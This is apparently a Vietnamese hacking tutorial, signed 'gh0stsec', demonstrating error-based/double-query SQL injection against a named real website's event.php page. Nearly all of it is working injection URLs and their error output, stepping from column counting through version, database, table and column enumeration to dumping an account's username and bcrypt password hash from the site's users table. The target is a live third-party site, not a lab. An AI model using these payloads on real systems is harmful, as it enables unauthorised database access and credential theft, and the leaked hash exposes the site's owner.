Hôm trước mình đã có giới thiệu qua kiểu khai thác Error Based/Double Query . Hôm nay mình sẽ demo 1 site bị dạng lỗi như vậy
Victim: http://nightgallery.ca/event.php?id=95
Check site có bị lỗi không
http://nightgallery.ca/event.php?id=95'Lỗi rồi!! --> Database Query Failed You have an error in your SQL syntax
Bước 1: Get column
http://nightgallery.ca/event.php?id=-95 order by 11-- -
Lỗi: Database Query Failed Unknown column '11' in 'order clause--> Số cột < 11
http://nightgallery.ca/event.php?id=-95 order by 10-- -Trang load bình thường như vậy có 10 column
http://nightgallery.ca/event.php?id=-95 UNION SELECT 1,2,3,4,5,6,7,8,9,10-- -
Lỗi --> Invalid query: The used SELECT statements have a different number of columnsĐây là dạng khai thác lỗi Error based/double query
Bước 2: Get version
http://nightgallery.ca/event.php?id=-95 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--
Lỗi-->Database Query Failed Duplicate entry '5.5.45-cll-lve:1' for key 'group_key'
--> Version 5.5.45
Bước 3: Get database
http://nightgallery.ca/event.php?id=95 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Database Query Failed Duplicate entry 'nightgallery20~1' for key 'group_key'--> Database : nightgallery20
Bước 4: Get Table_name
http://nightgallery.ca/event.php?id=95 and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Database Query Failed Duplicate entry 'ng_ads~1' for key 'group_key'
Ta xác định table_name: 'ng_ads' .Tiếp tục tăng limit lên cho tới khi tìm được table có thể khai thác data quan trọng như admin, user chẳng hạn
http://nightgallery.ca/event.php?id=95 and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 15,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Database Query Failed Duplicate entry 'ng_users~1' for key 'group_key'--> table: ng_users
Bước 5: Get column from table
Ở đây chúng ta khai thác table ng_users. Lưu ý: convert table qua mã hexahttp://nightgallery.ca/event.php?id=95 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x6e675f7573657273 limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Database Query Failed Duplicate entry 'username~1' for key 'group_key'--> column: username
Tiếp tục tăng limit lên
http://nightgallery.ca/event.php?id=95 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x6e675f7573657273 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--> column:hashed_password
Bước 6: Get data
http://nightgallery.ca/event.php?id=95 and (select 1 from (select count(*),concat((select(select concat(cast(concat(username,0x7e,hashed_password) as char),0x7e)) from nightgallery20.ng_users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Database Query Failed Duplicate entry 'nightgallery~$2y$10$NGFiNjIyN2Q5NTFiYzM2OOYYWmT9ERZ5fK5WyzZJNlQO' for key 'group_key'
Username: nightgallery
Password: $2y$10$NGFiNjIyN2Q5NTFiYzM2OOYYWmT9ERZ5fK5WyzZJNlQO
End tut: gh0stsec
